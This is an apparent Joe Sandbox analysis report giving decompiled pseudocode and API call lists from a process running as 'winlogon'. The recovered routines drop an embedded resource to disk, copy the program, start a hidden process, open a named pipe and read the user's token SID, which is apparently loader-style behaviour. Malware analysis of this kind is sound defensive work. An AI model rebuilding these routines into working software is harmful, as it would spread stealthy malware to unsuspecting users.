    												_t87 = _t164 + _t228 + 0x28;
    												 *_t87 =  *(_t164 + _t228 + 0x28) | 0x00000020;
    												__eflags =  *_t87;
    											}
    										}
    										_t267 = _v44;
    										__eflags = (_t267 & 0xc0000000) - 0xc0000000;
    										if((_t267 & 0xc0000000) != 0xc0000000) {
    											L31:
    											__eflags = 0;
    											return 0;
    										} else {
    											__eflags = _a16 & 0x00000001;
    											if((_a16 & 0x00000001) == 0) {
    												goto L31;
    											}
    											CloseHandle(_v12);
    											_v44 = _t267 & 0x7fffffff;
    											_t216 = 6;
    											_push( &_v24);
    											_push(_a12);
    											memcpy(_t281 - 0x18,  &_v48, _t216 << 2);
    											_t246 = E00D78814();
    											__eflags = _t246 - 0xffffffff;
    											if(_t246 != 0xffffffff) {
    												_t218 =  *_t191;
    												_t220 = (_t218 & 0x0000003f) * 0x30;
    												__eflags = _t220;
    												 *((intOrPtr*)( *((intOrPtr*)(0xd91260 + (_t218 >> 6) * 4)) + _t220 + 0x18)) = _t246;
    												goto L31;
    											}
    											E00D720EC(GetLastError());
    											 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) & 0x000000fe;
    											E00D76E2D( *_t191);
    											L10:
    											goto L2;
    										}
    									}
    									_t270 = _t134;
    									goto L22;
    								} else {
    									_t270 = E00D78A25(_t206,  *_t191);
    									__eflags = _t270;
    									if(__eflags != 0) {
    										L22:
    										E00D7294F(__eflags,  *_t191);
    										return _t270;
    									}
    									goto L20;
    								}
    							}
    							_t271 = GetLastError();
    							E00D720EC(_t271);
    							 *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) =  *( *((intOrPtr*)(0xd91260 + ( *_t191 >> 6) * 4)) + 0x28 + ( *_t191 & 0x0000003f) * 0x30) & 0x000000fe;
    							CloseHandle(_t253);
    							__eflags = _t271;
    							if(_t271 == 0) {
    								 *((intOrPtr*)(E00D72122())) = 0xd;
    							}
    							goto L2;
    						}
    						_t235 = _v44;
    						__eflags = (_t235 & 0xc0000000) - 0xc0000000;
    						if((_t235 & 0xc0000000) != 0xc0000000) {
    							L9:
    							_t236 =  *_t191;
    							_t238 = (_t236 & 0x0000003f) * 0x30;
    							_t180 =  *((intOrPtr*)(0xd91260 + (_t236 >> 6) * 4));
    							_t33 = _t180 + _t238 + 0x28;
    							 *_t33 =  *(_t180 + _t238 + 0x28) & 0x000000fe;
    							__eflags =  *_t33;
    							E00D720EC(GetLastError());
    							goto L10;
    						}
    						__eflags = _a16 & 0x00000001;
    						if((_a16 & 0x00000001) == 0) {
    							goto L9;
    						}
    						_t285 = _t278 - 0x18;
    						_v44 = _t235 & 0x7fffffff;
    						_t240 = 6;
    						_push( &_v24);
    						_push(_a12);
    						memcpy(_t285,  &_v48, _t240 << 2);
    						_t198 = 0;
    						_t253 = E00D78814();
    						_t278 = _t285 + 0x2c;
    						_v12 = _t253;
    						__eflags = _t253 - 0xffffffff;
    						if(_t253 != 0xffffffff) {
    							goto L11;
    						}
    						goto L9;
    					} else {
    						 *(E00D7210F()) =  *_t186 & 0x00000000;
    						 *_t191 = _t264;
    						 *((intOrPtr*)(E00D72122())) = 0x18;
    						goto L2;
    					}
    				} else {
    					 *(E00D7210F()) =  *_t188 & 0x00000000;
    					 *_a8 = _t264;
    					L2:
    					return  *((intOrPtr*)(E00D72122()));
    				}
    			}

    APIs
      • Part of subcall function 00D76D1B: EnterCriticalSection.KERNEL32(00000000,00D86CB8,0000001C,00D78B96,?,?,00000000,?,00000000,00D86D78,00000010,00D78B41,?,00000000,?,00D72653), ref: 00D76DC2
      • Part of subcall function 00D76D1B: LeaveCriticalSection.KERNEL32(00000000,?,?,00000000,?,00000000,00D86D78,00000010,00D78B41,?,00000000,?,00D72653,?,00000001), ref: 00D76DCF
      • Part of subcall function 00D78814: CreateFileW.KERNEL32(00000000,00000000,?,00D78BEF,?,?,00000000), ref: 00D78831
    • GetLastError.KERNEL32 ref: 00D78C5A
    • GetFileType.KERNEL32(00000000), ref: 00D78C6D
    • GetLastError.KERNEL32 ref: 00D78C77
    • CloseHandle.KERNEL32(00000000), ref: 00D78CA0
      • Part of subcall function 00D76C64: SetStdHandle.KERNEL32(000000F6,00D78CDF,00000000,?,?,?,?,00D78CDF,?,00000000), ref: 00D76CC3
    • CloseHandle.KERNEL32(?), ref: 00D78DEA
    • GetLastError.KERNEL32 ref: 00D78E1C
      • Part of subcall function 00D76E2D: SetStdHandle.KERNEL32(000000F6,00000000,00000001,00000000,?,?,00D729BD,00000001,?,00D7286D,?,00D86BD0,0000000C), ref: 00D76E8D
      • Part of subcall function 00D7294F: CloseHandle.KERNEL32(00000000), ref: 00D729A5
      • Part of subcall function 00D7294F: GetLastError.KERNEL32(?,00D7286D,?,00D86BD0,0000000C), ref: 00D729AF
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph

    C-Code - Quality: 69%
    			E00D63230(void* __ebx, void* __edx, void* __edi, void* __esi, intOrPtr* _a8) {
    				signed int _v8;
    				char _v9;
    				short _v11;
    				intOrPtr _v12;
    				char _v15;
    				char _v16;
    				char _v24;
    				char _v25;
    				short _v27;
    				char _v31;
    				char _v56;
    				short _v636;
    				char _v1148;
    				short _v2172;
    				intOrPtr _v2176;
    				char _v2188;
    				char _v2192;
    				char _v2196;
    				signed int _t46;
    				void* _t55;
    				void* _t60;
    				void* _t61;
    				char* _t62;
    				intOrPtr* _t82;
    				char* _t86;
    				signed int _t114;
    
    				_t46 =  *0xd88004; // 0x276b9783
    				_v8 = _t46 ^ _t114;
    				_t82 = _a8;
    				if(__edx == 0 || _t82 == 0) {
    					L15:
    					return E00D6ABE4(_v8 ^ _t114);
    				} else {
    					asm("xorps xmm0, xmm0");
    					_v24 = 0;
    					asm("movq [ebp-0x13], xmm0");
    					_v15 = 0;
    					_v11 = 0;
    					_v9 = 0;
    					if(E00D6A670(_t82,  &_v24) != 0) {
    						asm("xorps xmm0, xmm0");
    						_v56 = 0;
    						asm("movq [ebp-0x23], xmm0");
    						_t86 =  &_v56;
    						_v31 = 0;
    						asm("movups [ebp-0x33], xmm0");
    						_v27 = 0;
    						_v25 = 0;
    						if(E00D6A3F0(_t86,  &_v24) == 0) {
    							goto L3;
    						} else {
    							_push(_t86);
    							_v2196 = 0;
    							_v2192 = 0;
    							_v16 = 0;
    							_v12 = 0;
    							_t55 = E00D6AAD0(L"BIN", __edx,  &_v2196); // executed
    							if(_t55 == 0) {
    								goto L3;
    							} else {
    								_t112 = _v2192;
    								_t90 = _v2192;
    								if(E00D6A6F0(_v2192,  &_v16) == 0 || E00D6A4B0(_t82,  &_v2196,  &_v16, __edi, _t112, _t112, _t90,  &_v56) == 0) {
    									goto L3;
    								} else {
    									if(E00D6AA60( &_v16) == 0) {
    										goto L15;
    									} else {
    										_v2192 = 0;
    										_t60 = E00D6A840(_t82,  &_v2192, _t112); // executed
    										if(_t60 == 0) {
    											goto L15;
    										} else {
    											_t109 = _v2192;
    											if(_v2192 == 0) {
    												goto L15;
    											} else {
    												_t61 = E00D6A550(_t109,  &_v16); // executed
    												if(_t61 == 0) {
    													goto L15;
    												} else {
    													_t62 =  &_v2188;
    													_v2188 = 0;
    													asm("xorps xmm0, xmm0");
    													_v2176 = 0;
    													asm("movq [ebp-0x884], xmm0"); // executed
    													__imp__CoCreateGuid(_t62); // executed
    													if(_t62 != 0) {
    														goto L15;
    													} else {
    														E00D6D520(_t109,  &_v1148, _t62, 0x200);
    														if(E00D6AB90( &_v2188,  &_v1148) == 0) {
    															goto L15;
    														} else {
    															E00D6D520(_t109,  &_v636, 0, 0x240);
    															wsprintfW( &_v636, L"\\\\.\\pipe\\%ls",  &_v1148);
    															E00D6D520(_t109,  &_v2172, 0, 0x400);
    															wsprintfW( &_v2172, L" %ls %ls", L"123",  &_v636);
    															E00D634B0( &_v636, _t109,  &_v2172, _t82); // executed
    															asm("sbb eax, eax");
    															return E00D6ABE4(_v8 ^ _t114);
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					} else {
    						L3:
    						return E00D6ABE4(_v8 ^ _t114);
    					}
    				}
    			}


    APIs
      • Part of subcall function 00D6AAD0: GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,00D631A7,?), ref: 00D6AB08
      • Part of subcall function 00D6AAD0: FindResourceW.KERNEL32(00000000,?,?), ref: 00D6AB19
      • Part of subcall function 00D6AAD0: LoadResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB27
      • Part of subcall function 00D6AAD0: LockResource.KERNEL32(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB32
      • Part of subcall function 00D6AAD0: SizeofResource.KERNEL32(00000000,00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6AB41
      • Part of subcall function 00D6A6F0: GetProcessHeap.KERNEL32(00000008,00000000,00000000,?,00D6AB56,?,?,?,?,?,?,00D631A7,?), ref: 00D6A701
      • Part of subcall function 00D6A6F0: RtlAllocateHeap.NTDLL(00000000,?,?,?,?,?,?,00D631A7,?), ref: 00D6A708
      • Part of subcall function 00D6A550: CreateFileW.KERNEL32(?,C0000000,00000003,00000000,00000002,00000000,00000000), ref: 00D6A573
      • Part of subcall function 00D6A550: WriteFile.KERNEL32(00000000,?,?,00D63200,00000000), ref: 00D6A59F
      • Part of subcall function 00D6A550: CloseHandle.KERNEL32(00000000), ref: 00D6A5A8
      • Part of subcall function 00D6A550: DeleteFileW.KERNEL32(?,?,?), ref: 00D6A5B3
    • CoCreateGuid.OLE32(?), ref: 00D633BF
      • Part of subcall function 00D6AB90: wsprintfW.USER32 ref: 00D6ABD2
    • wsprintfW.USER32 ref: 00D6342A
    • wsprintfW.USER32 ref: 00D6345D
      • Part of subcall function 00D634B0: CreateNamedPipeW.KERNELBASE(?,40000001,00000000,00000001,00000000,00019000,0000EA60,00000000,00000000,773F423D,?), ref: 00D634EB
      • Part of subcall function 00D634B0: CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00D63527
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D63535
      • Part of subcall function 00D634B0: ConnectNamedPipe.KERNELBASE(00000000,00000000), ref: 00D63549
      • Part of subcall function 00D634B0: GetLastError.KERNEL32 ref: 00D63551
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D63599
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D6359E
      • Part of subcall function 00D634B0: WaitForSingleObject.KERNEL32(00000000,0000EA60), ref: 00D635C6
      • Part of subcall function 00D634B0: GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00D635DA
      • Part of subcall function 00D634B0: CancelIo.KERNEL32(00000000), ref: 00D635E5
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D635F5
      • Part of subcall function 00D634B0: ReadFile.KERNEL32(00000000,00000000,00019000,00000000,00000000), ref: 00D6363A
      • Part of subcall function 00D634B0: CloseHandle.KERNEL32(00000000), ref: 00D63685
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
      • Part of subcall function 00D6A670: __Stoull.NTSTC_LIBCMT ref: 00D6A697
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph

    C-Code - Quality: 48%
    			E00D671E0(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
    				WCHAR* _v8;
    				char _v16;
    				signed int _v20;
    				short _v2068;
    				intOrPtr _v2072;
    				intOrPtr _v2076;
    				char _v5164;
    				char _v6188;
    				char _v7212;
    				struct _CRITICAL_SECTION _v7636;
    				char _v7644;
    				char _v7648;
    				WCHAR* _v7652;
    				WCHAR* _v7656;
    				void* __ebp;
    				signed int _t33;
    				signed int _t34;
    				intOrPtr _t41;
    				char* _t69;
    				void* _t79;
    				signed int _t87;
    				void* _t93;
    
    				_t93 = __eflags;
    				_t84 = __esi;
    				_t83 = __edi;
    				_t79 = __edx;
    				_t65 = __ebx;
    				_push(0xffffffff);
    				_push(E00D7E42B);
    				_push( *[fs:0x0]);
    				E00D7D900();
    				_t33 =  *0xd88004; // 0x276b9783
    				_t34 = _t33 ^ _t87;
    				_v20 = _t34;
    				_push(__esi);
    				_push(_t34);
    				 *[fs:0x0] =  &_v16;
    				GetCurrentProcessId();
    				E00D66390( &_v7648);
    				_v8 = 0;
    				if(E00D66500(__ebx,  &_v7648, _t79, __edi, __esi, _t93) != 0) {
    					E00D666C0(__ebx, __edi, __esi, __eflags); // executed
    					__eflags = _v2076;
    					if(__eflags != 0) {
    						E00D658E0(__ebx, __edi, __esi, __eflags);
    					}
    					__eflags = _v2072;
    					if(__eflags != 0) {
    						E00D65B80(_t65, _t83, _t84, __eflags); // executed
    					}
    					E00D665A0(_t65,  &_v7648, _t83, _t84); // executed
    					_t69 =  &_v6188;
    					_t41 = E00D64040(_t65, _t69, _t83, _t84); // executed
    					__eflags = _t41;
    					if(_t41 != 0) {
    						_t69 =  &_v7648;
    						E00D61FB0(_t65, _t69, _t83, _t84,  &_v6188); // executed
    					}
    					_push(_t69);
    					E00D63F30(_t65, 0x68, _t83, _t84,  &_v7212); // executed
    					E00D63F30(_t65, 0x69, _t83, _t84,  &_v5164); // executed
    					_v7652 = 0;
    					_v7656 = 0;
    					E00D64220( &_v5164, _t69,  &_v7656,  &_v7652); // executed
    					L00D66ED0(_t65,  &_v7648, _t83, _t84,  &_v6188); // executed
    					E00D6D520(_t83,  &_v2068, 0, 0x800);
    					GetModuleFileNameW(GetModuleHandleW(0),  &_v2068, 0x3ff);
    					E00D65DD0(_t65, 0xbb8,  &_v2068, _t83, _t84);
    					__eflags = 0;
    				}
    				__imp__#116();
    				_v7644 = _v7648;
    				DeleteCriticalSection( &_v7636);
    				E00D68340(_t65,  &_v7648, _t83);
    				 *[fs:0x0] = _v16;
    				return E00D6ABE4(_v20 ^ _t87);
    			}

    APIs
    • GetCurrentProcessId.KERNEL32(276B9783,00000000,00000000,00D7E42B,000000FF,?,invalid vector<T> subscript), ref: 00D67210
      • Part of subcall function 00D66390: InitializeCriticalSection.KERNEL32(?,00000000,00D67221,?,invalid vector<T> subscript), ref: 00D663AB
      • Part of subcall function 00D66500: WSAStartup.WS2_32(00000202,?), ref: 00D6651C
      • Part of subcall function 00D66500: GetModuleHandleA.KERNEL32(00000000,?,000003FF,?,00000000), ref: 00D6656C
      • Part of subcall function 00D66500: GetModuleFileNameA.KERNEL32(00000000,?,00000000), ref: 00D66573
      • Part of subcall function 00D666C0: GetFileAttributesA.KERNELBASE(?), ref: 00D666FF
      • Part of subcall function 00D666C0: GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D66735
      • Part of subcall function 00D666C0: GetModuleFileNameW.KERNEL32(00000000), ref: 00D6673C
      • Part of subcall function 00D666C0: ExitProcess.KERNEL32 ref: 00D66754
      • Part of subcall function 00D64040: GetModuleHandleA.KERNEL32(00000000,?,000003FF), ref: 00D640B4
      • Part of subcall function 00D64040: GetModuleFileNameA.KERNEL32(00000000), ref: 00D640BB
      • Part of subcall function 00D64040: CopyFileA.KERNEL32(?,?,00000000), ref: 00D640D1
      • Part of subcall function 00D64040: GetFileAttributesA.KERNELBASE(?), ref: 00D640E2
      • Part of subcall function 00D64220: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6427E
      • Part of subcall function 00D64220: GetLastError.KERNEL32(?,00000000,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 00D6428E
      • Part of subcall function 00D671E0: GetFileAttributesA.KERNELBASE(?,276B9783), ref: 00D66F0D
      • Part of subcall function 00D671E0: GetFileAttributesA.KERNELBASE(?), ref: 00D66F2E
      • Part of subcall function 00D671E0: InitializeCriticalSection.KERNEL32(?), ref: 00D66F75
      • Part of subcall function 00D671E0: InitializeCriticalSection.KERNEL32(?), ref: 00D66FB4
      • Part of subcall function 00D671E0: InitializeCriticalSection.KERNEL32(?), ref: 00D66FCF
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,00000000,000000FF,00000000,00000000), ref: 00D6705D
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,00000000,000000FF,00000000,00000000), ref: 00D67081
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,-00000100,000000FF,00000000,00000000), ref: 00D670C3
      • Part of subcall function 00D671E0: MultiByteToWideChar.KERNEL32(00000000,00000008,?,000000FF,00000000,?), ref: 00D670EB
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D67178
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D6718C
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D671A9
      • Part of subcall function 00D671E0: GetModuleHandleW.KERNEL32(00000000,?,000003FF), ref: 00D6731C
      • Part of subcall function 00D671E0: GetModuleFileNameW.KERNEL32(00000000), ref: 00D67323
      • Part of subcall function 00D671E0: WSACleanup.WS2_32 ref: 00D6733B
      • Part of subcall function 00D671E0: DeleteCriticalSection.KERNEL32(?), ref: 00D67354
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph

    C-Code - Quality: 69%
    			E00D79096(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, signed int _a12, char* _a16, int _a20, intOrPtr _a24, short* _a28, int _a32, intOrPtr _a36) {
    				signed int _v8;
    				int _v12;
    				void* _v24;
    				signed int _t49;
    				signed int _t54;
    				int _t58;
    				signed int _t60;
    				short* _t62;
    				signed int _t66;
    				short* _t70;
    				int _t71;
    				int _t78;
    				short* _t81;
    				signed int _t87;
    				signed int _t90;
    				void* _t95;
    				void* _t96;
    				int _t98;
    				short* _t101;
    				int _t103;
    				signed int _t106;
    				short* _t107;
    				void* _t110;
    
    				_push(__ecx);
    				_push(__ecx);
    				_t49 =  *0xd88004; // 0x276b9783
    				_v8 = _t49 ^ _t106;
    				_push(__esi);
    				_t103 = _a20;
    				if(_t103 > 0) {
    					_t78 = E00D7B648(_a16, _t103);
    					_t110 = _t78 - _t103;
    					_t4 = _t78 + 1; // 0x1
    					_t103 = _t4;
    					if(_t110 >= 0) {
    						_t103 = _t78;
    					}
    				}
    				_t98 = _a32;
    				if(_t98 == 0) {
    					_t98 =  *( *_a4 + 8);
    					_a32 = _t98;
    				}
    				_t54 = MultiByteToWideChar(_t98, 1 + (0 | _a36 != 0x00000000) * 8, _a16, _t103, 0, 0);
    				_v12 = _t54;
    				if(_t54 == 0) {
    					L38:
    					return E00D6ABE4(_v8 ^ _t106);
    				} else {
    					_t95 = _t54 + _t54;
    					_t85 = _t95 + 8;
    					asm("sbb eax, eax");
    					if((_t95 + 0x00000008 & _t54) == 0) {
    						_t81 = 0;
    						__eflags = 0;
    						L14:
    						if(_t81 == 0) {
    							L36:
    							_t105 = 0;
    							L37:
    							E00D77337(_t81);
    							goto L38;
    						}
    						_t58 = MultiByteToWideChar(_t98, 1, _a16, _t103, _t81, _v12);
    						_t121 = _t58;
    						if(_t58 == 0) {
    							goto L36;
    						}
    						_t100 = _v12;
    						_t60 = E00D74FB1(_t85, _t103, _t121, _a8, _a12, _t81, _v12, 0, 0, 0, 0, 0); // executed
    						_t105 = _t60;
    						if(_t105 == 0) {
    							goto L36;
    						}
    						if((_a12 & 0x00000400) == 0) {
    							_t96 = _t105 + _t105;
    							_t87 = _t96 + 8;
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							__eflags = _t87 & _t60;
    							if((_t87 & _t60) == 0) {
    								_t101 = 0;
    								__eflags = 0;
    								L30:
    								__eflags = _t101;
    								if(__eflags == 0) {
    									L35:
    									E00D77337(_t101);
    									goto L36;
    								}
    								_t62 = E00D74FB1(_t87, _t105, __eflags, _a8, _a12, _t81, _v12, _t101, _t105, 0, 0, 0);
    								__eflags = _t62;
    								if(_t62 == 0) {
    									goto L35;
    								}
    								_push(0);
    								_push(0);
    								__eflags = _a28;
    								if(_a28 != 0) {
    									_push(_a28);
    									_push(_a24);
    								} else {
    									_push(0);
    									_push(0);
    								}
    								_t105 = WideCharToMultiByte(_a32, 0, _t101, _t105, ??, ??, ??, ??);
    								__eflags = _t105;
    								if(_t105 != 0) {
    									E00D77337(_t101);
    									goto L37;
    								} else {
    									goto L35;
    								}
    							}
    							_t90 = _t96 + 8;
    							__eflags = _t96 - _t90;
    							asm("sbb eax, eax");
    							_t66 = _t60 & _t90;
    							_t87 = _t96 + 8;
    							__eflags = _t66 - 0x400;
    							if(_t66 > 0x400) {
    								__eflags = _t96 - _t87;
    								asm("sbb eax, eax");
    								_t101 = E00D717FF(_t87, _t66 & _t87);
    								_pop(_t87);
    								__eflags = _t101;
    								if(_t101 == 0) {
    									goto L35;
    								}
    								 *_t101 = 0xdddd;
    								L28:
    								_t101 =  &(_t101[4]);
    								goto L30;
    							}
    							__eflags = _t96 - _t87;
    							asm("sbb eax, eax");
    							E00D7D520();
    							_t101 = _t107;
    							__eflags = _t101;
    							if(_t101 == 0) {
    								goto L35;
    							}
    							 *_t101 = 0xcccc;
    							goto L28;
    						}
    						_t70 = _a28;
    						if(_t70 == 0) {
    							goto L37;
    						}
    						_t125 = _t105 - _t70;
    						if(_t105 > _t70) {
    							goto L36;
    						}
    						_t71 = E00D74FB1(0, _t105, _t125, _a8, _a12, _t81, _t100, _a24, _t70, 0, 0, 0);
    						_t105 = _t71;
    						if(_t71 != 0) {
    							goto L37;
    						}
    						goto L36;
    					}
    					asm("sbb eax, eax");
    					_t72 = _t54 & _t95 + 0x00000008;
    					_t85 = _t95 + 8;
    					if((_t54 & _t95 + 0x00000008) > 0x400) {
    						__eflags = _t95 - _t85;
    						asm("sbb eax, eax");
    						_t81 = E00D717FF(_t85, _t72 & _t85);
    						_pop(_t85);
    						__eflags = _t81;
    						if(__eflags == 0) {
    							goto L36;
    						}
    						 *_t81 = 0xdddd;
    						L12:
    						_t81 =  &(_t81[4]);
    						goto L14;
    					}
    					asm("sbb eax, eax");
    					E00D7D520();
    					_t81 = _t107;
    					if(_t81 == 0) {
    						goto L36;
    					}
    					 *_t81 = 0xcccc;
    					goto L12;
    				}
    			}
    [Per-line address column for the listing above (0x00d7909b to 0x00d792ab; 0x00000000 marks synthesized lines without a code address) omitted; the call sites are given by the 'ref:' addresses under APIs.]

    APIs
    • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00D6FADD,00D6FADD,?,?,?,00D792E7,00000001,00000001,27E85006), ref: 00D790F0
    • __alloca_probe_16.NTDLLP ref: 00D79128
    • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,00D792E7,00000001,00000001,27E85006,?,?,?), ref: 00D79176
      • Part of subcall function 00D74FB1: LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,27E85006,00000001,?,?), ref: 00D75022
    • __alloca_probe_16.NTDLLP ref: 00D7920D
      • Part of subcall function 00D717FF: RtlAllocateHeap.NTDLL(00000000,?,?,?,00D61CE9,?,?,?,?,00D61B06,?,00000001), ref: 00D71831
    • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,27E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00D79270
    • __freea.LIBCMT ref: 00D7927D
    • __freea.LIBCMT ref: 00D79286
      • Part of subcall function 00D6ABE4: IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00D6AEA3
    • __freea.LIBCMT ref: 00D792AB
    Memory Dump Source
    • Source File: 00000001.00000002.1621971057.00D61000.00000020.sdmp, Offset: 00D60000, based on PE: true
    • Associated: 00000001.00000002.1621960681.00D60000.00000002.sdmp
    • Associated: 00000001.00000002.1621993610.00D7F000.00000002.sdmp
    • Associated: 00000001.00000002.1622007213.00D88000.00000004.sdmp
    • Associated: 00000001.00000002.1622017224.00D89000.00000008.sdmp
    • Associated: 00000001.00000002.1622024620.00D90000.00000004.sdmp
    • Associated: 00000001.00000002.1622032358.00D92000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_d60000_winlogon.jbxd

    Control-flow Graph (rendered graph not preserved; legend: Executed / Not Executed). The extracted node and edge list follows: nodes as `id start-end [APIs called]`, edges as `from->to`.
    control_flow_graph 549 d62820-d6282c 550 d62842 549->550 551 d6282e-d62834 549->551 552 d62844-d62857 call d61a30 550->552 551->550 553 d62836-d62839 551->553 557 d62861-d6287b 552->557 558 d62859-d62860 552->558 553->550 555 d6283b-d62840 553->555 555->552 557->558 560 d6287d-d62882 557->560 560->558 561 d62884-d62892 call d702c9 560->561 564 d6289b-d628a5 561->564 565 d62894-d6289a 561->565 566 d628ac-d628ae 564->566 567 d628b0-d628ba IsValidSid 566->567 568 d628f1 566->568 567->568 569 d628bc-d628c8 GetLengthSid 567->569 570 d628f3-d628f6 568->570 569->568 571 d628ca-d628d7 call d702c9 569->571 572 d628f8-d628fe 570->572 573 d62909-d62911 570->573 571->568 578 d628d9-d628e5 CopySid 571->578 572->573 575 d62900-d62906 call d7009a 572->575 575->573 580 d62912-d62917 578->580 581 d628e7-d628ee call d7009a 578->581 580->570 581->568
    C-Code - Quality: 75%
    			E00D62820(void* __ecx, void** __edx) {
    				long _v8;
    				union _TOKEN_INFORMATION_CLASS _t6;
    				void* _t7;
    				int _t9;
    				long _t11;
    				void* _t12;
    				int _t14;
    				void* _t19;
    				void** _t23;
    				union _TOKEN_INFORMATION_CLASS _t25;
    				void* _t31;
    				long _t34;
    				void* _t37;
    				void* _t40;
    				void* _t41;
    				void* _t42;
    
    				_t28 = __ecx;
    				_push(__ecx);
    				_t31 = __ecx;
    				_t23 = __edx;
    				if(__ecx == 0 || __ecx == 0xcccccccc || __ecx == 0xffffffff) {
    					_t6 = 0;
    				} else {
    					_t6 = 1;
    				}
    				_push(0xdeefbad7);
    				_push(_t23);
    				_t7 = E00D61A30(0, _t6);
    				_t41 = _t40 + 0x10;
    				if(_t7 != 0) {
    					_v8 = 0;
    					_t9 = GetTokenInformation(_t31, 1, 0, 0,  &_v8); // executed; 1 = TokenUser, first call only sizes the buffer (_v8)
    					if(_t9 != 0) {
    						goto L6;
    					} else {
    						_t11 = _v8;
    						if(_t11 == 0) {
    							goto L6;
    						} else {
    							_push(_t11);
    							_t12 = E00D702C9(_t28);
    							_t37 = _t12;
    							_t42 = _t41 + 4;
    							if(_t37 != 0) {
    								_t14 = GetTokenInformation(_t31, 1, _t37, _v8,  &_v8); // executed; TokenUser: *_t37 is TOKEN_USER.User.Sid, copied out below with CopySid
    								if(_t14 == 0 || IsValidSid( *_t37) == 0) {
    									L17:
    									_t25 = 0;
    								} else {
    									_t34 = GetLengthSid( *_t37);
    									if(_t34 == 0) {
    										goto L17;
    									} else {
    										_push(_t34);
    										_t19 = E00D702C9(_t28);
    										_t42 = _t42 + 4;
    										 *_t23 = _t19;
    										if(_t19 == 0) {
    											goto L17;
    										} else {
    											if(CopySid(_t34, _t19,  *_t37) != 0) {
    												_t25 = 1;
    											} else {
    												E00D7009A( *_t23);
    												_t42 = _t42 + 4;
    												goto L17;
    											}
    										}
    									}
    								}
    								if(_t37 != 0xffffffff && _t37 != 0xcccccccc) {
    									E00D7009A(_t37);
    								}
    								return _t25;
    							} else {
    								return _t12;
    							}
    						}
    					}
    				} else {
    					L6:
    					return 0;
    				}
    			}
    [Per-line address column for the listing above (0x00d62820 to 0x00d62912) omitted; the call sites are given by the 'ref:' addresses under APIs.]

    APIs
